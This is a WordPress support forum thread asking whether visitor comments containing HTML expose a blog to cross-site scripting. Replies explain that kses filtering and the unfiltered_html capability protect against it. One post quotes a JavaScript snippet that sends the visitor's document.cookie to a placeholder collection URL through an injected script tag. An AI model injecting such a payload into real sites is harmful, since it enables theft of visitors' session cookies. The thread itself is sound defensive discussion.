[resolved] How to make comments safe? (11 posts)

  1. deko
    Posted 10 years ago #

    How risky is it to allow a commenter to use HTML tags in his comments?

    For example, what if the commenter tries something like this:

    malicious code here

    Does anyone know of a plug-in that addresses this?

  2. Chris_K
    Posted 10 years ago #

    Out of curiosity, what happened when you tried that? What was your test?

  3. deko
    Posted 10 years ago #

    var url = 'http://www.mysite.com/send_me_passwords.cgi';
    url = url + '?cookie=' + escape(document.cookie)
    document.write('<script src="'+url+'">');

    from: http://iamcal.com/publish/articles/php/processing_html/

    I think it would be best to disallow all markup in comments to avoid any risk.

    This plugin:


    Is supposed to:

    "Strip all HTML tags in comments to prevent malicious or malformed tags from destroying your pages"

    I have not tested it. I downloaded it and it's only one script that appears to reference a non-existant function.

    What we need is built-in comment scrubbing.

  4. deko
    Posted 10 years ago #

    This looks promising:


    But the first line of the script is this:

    // requires HTMLSax3 package
    require_once 'XML/HTMLSax3.php';

    Does anyone know how to verify if my host's server has the HTMLSax3 package installed?

    Can this be verified using phpinfo.php?

  5. deko
    Posted 10 years ago #

    This is a better site to download HTML_Safe:


    I've tested and verified that a bug exists in 2.0.2, namely, that an unclosed markup tag, submitted in a comment, will affect the appearance of text outside of that comment, thus altering the display of your blog.

    But the more important question remains:

    Are WP blogs at risk of cross-site scripting (XSS) when users submit malicious code in the Comments form?

  6. davidchait
    Posted 10 years ago #

    I was pretty sure WP >did< some level of scrubbing. What have you tried that's worked?

  7. deko
    Posted 10 years ago #

    I don't know enough about XSS to test for a vulnerability, but I'm going to use HTML_Safe anyway, if only to squash the 'unclosed tag in comments' bug.

    I looked for codex documentation explaining why WP blogs are safe from XSS and other malicious code submitted in comments. I found this:


    Allows - if enabled - the user to post HTML markup or even Javascript code in posts, pages or comments.

    Note: Enabling this option for non-privileged users may result in their posting malicious code to your blog.


    I don't know if unfiltered_html is disabled by default, but unless there's some documentation assuring us that we're safe, it's best to assume we're not.

  8. robmil
    Posted 10 years ago #

    Definitely definitely safe. The unfiltered_html cap is only given to admins and certainly not to anonymous users or even registered ones.

    This is something that has been safe in the WP core for literally years.

  9. ringmaster
    Posted 10 years ago #

    unfiltered_html is granted initially only to users having the Administrator or Editor roles. Casual users visiting your site will have their comments stripped of tags that are not allowed, including script tags.

    When you are logged in as a user with the unfiltered_html capability, you are allowed to post script into comments. This is why you would be able to do this on your own blog.

    IIRC, kses is used to prevent unwanted markup from users without this capability.

  10. Ryan Boren
    WordPress Dev
    Posted 10 years ago #

    WP uses kses to filter comments. Users that have the unfiltered_html capability (Editors and Administrators) are not filtered. They are considered trusted.

  11. deko
    Posted 10 years ago #

    I did some testing with the kses file, and yes, it appears that unfiltered_html is allowed only for Admins and Editors.

    I commented the <em> tag (from @allowedtags) and then tried makring up a comment with it to see if had any effect - it didn't, unless I was logged in as Admin (indicating that html was filtered by kses otherwise).

    So kses is protecting us.

    kses doesn't catch unclosed tags in comments, but this is not a security problem.

Topic Closed

This topic has been closed to new replies.

About this Topic